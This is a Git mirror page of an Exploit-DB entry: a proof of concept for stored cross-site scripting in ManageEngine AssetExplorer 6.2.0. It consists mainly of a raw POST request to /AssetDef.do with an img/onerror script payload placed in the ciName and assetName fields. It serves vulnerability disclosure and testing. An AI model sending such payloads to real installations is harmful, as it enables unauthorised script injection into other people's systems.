bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/java/webapps/45507.txt
Offensive Security 716ece3cc6 DB: 2018-10-02 
13 changes to exploits/shellcodes

Snes9K 0.0.9z - Denial of Service (PoC)
Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation
H2 Database 1.4.196 - Remote Code Execution
ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting
Fork CMS 5.4.0 - Cross-Site Scripting
Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection
Education Website 1.0 - 'subject' SQL Injection
Singleleg MLM Software 1.0 - 'msg_id' SQL Injection
Binary MLM Software 1.0 - 'pid' SQL Injection
Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection
WUZHICMS 2.0 - Cross-Site Scripting
Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
2018-10-02 05:01:58 +00:00

30 lines
No EOL
2 KiB
Text
Raw Blame History

# Exploit Title: ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting
# Date: 2018-09-26
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/asset-explorer/
# Software : ZOHO Corp ManageEngine AssetExplorer 6.2.0
# Product Version: 6.2.0
# Vulernability Type : Cross-Site Scripting
# Vulenrability : Stored XSS
# CVE : N/A
#In Zoho ManageEngine AssetExplorer, a Stored XSS vulnerability was discovered in the 6.2.0
# version via the /AssetDef.do ciName or assetName parameter.
# HTTP Request Header :
POST /AssetDef.do HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/AssetDef.do
Cookie: JSESSIONID=70D4D1E08E51E5401B3E8FE1D17CAE9D; JSESSIONIDSSO=01AE09FF54B9B733107CD17E6D4079D7; sdp=8cb6d209-54e0-41cc-8bb2-1d462c6d3b72; nonitassetslinks=hide; Components=hide; virtual=hide; viewlinks=hide; Softwarediv=hide; barcodeDiv=hide; itassetslinks=show; %5Bobject%20HTMLTableRowElement%5D=hide; %5Bobject%20HTMLTableElement%5D=hide
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 705
typeId=9&ciTypeId=21&ciId=null&ciName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&assetName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&componentID=301&CI_BaseElement_ATTRIBUTE_302=&CI_BaseElement_IMPACTID=null&ciDescription=&activeStateId=2&isStateChange=&resourceState=1&assignedType=Assign&asset=0&user=0&department=0&leaseStart=&leaseEnd=&site=-1&location=&vendorID=0&assetPrice=0&assetTag=&acqDate=&assetSerialNo=&expDate=&assetBarCode=&warrantyExpDate=&udfName3=&depreciationTypeId=&declinePercent=&usefulLife=&depreciationPercent=&salvageValue=&isProductInfoChanged=&assetID=&previousSite=&addAsset=Save&purchasecost=&modifycost=true&oldAssociatedVendor=
Reference in a new issue View git blame Copy permalink